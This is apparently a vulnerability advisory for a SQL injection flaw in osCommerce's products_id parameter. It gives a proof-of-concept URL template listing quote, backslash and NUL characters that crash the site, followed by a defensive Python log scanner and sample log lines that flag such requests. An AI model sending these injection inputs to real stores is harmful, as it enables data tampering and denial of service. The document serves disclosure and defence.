osCommerce products_id URI Parameter SQL Injection Vulnerability
The following proof of concept has been supplied:

http://www.example.com/default.php?cPath=[MID]&sort=5a&page=1&action=buy_now&products_id=[PID][JNK]

[MID] = A valid manufacturer ID number
[PID] = A valid product ID number
[JNK] = SQL query or junk. %22, %5C, %27 or %00 will cause a DoS.
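To find requests of this shape in web server logs, the following added example (not part of the original advisory or of osCommerce) flags any `products_id` value that is not a plain number. It assumes common/combined access-log format and that a legitimate `products_id` is purely decimal; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: a legitimate products_id is a plain decimal number ([PID] above).
VALID_PID = re.compile(r"[0-9]{1,10}")
# Characters the advisory lists as triggering the failure: " \ ' and NUL.
BREAKING = set("\"\\'\x00")
# Request line of a common/combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def check_products_id(url):
    """Return (decoded_value, reason) for every suspicious products_id in url."""
    findings = []
    for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if key != "products_id" or VALID_PID.fullmatch(value):
            continue
        if BREAKING & set(value):
            reason = "quote, backslash or NUL byte"
        else:
            reason = "not a plain number"
        findings.append((value, reason))
    return findings

def scan_log(lines):
    """Return (line_number, decoded_value, reason) for each flagged request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if match:
            for value, reason in check_products_id(match.group(1)):
                hits.append((number, value, reason))
    return hits

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2004:10:00:00 +0000] "GET /default.php?cPath=3&sort=5a&page=1&action=buy_now&products_id=12 HTTP/1.1" 302 -',
    '192.0.2.11 - - [01/Jan/2004:10:00:05 +0000] "GET /default.php?cPath=3&sort=5a&page=1&action=buy_now&products_id=12%27 HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2004:10:00:09 +0000] "GET /default.php?cPath=3&sort=5a&page=1&action=buy_now&products_id=12%00 HTTP/1.1" 200 512',
    '192.0.2.12 - - [01/Jan/2004:10:00:20 +0000] "GET /default.php?cPath=3&action=buy_now&products_id=abc HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, value, reason in scan_log(SAMPLE_LOG):
        print(f"line {number}: products_id={value!r} ({reason})")
```

The same strict numeric check, applied server-side before the value reaches a query, rejects these inputs at the application.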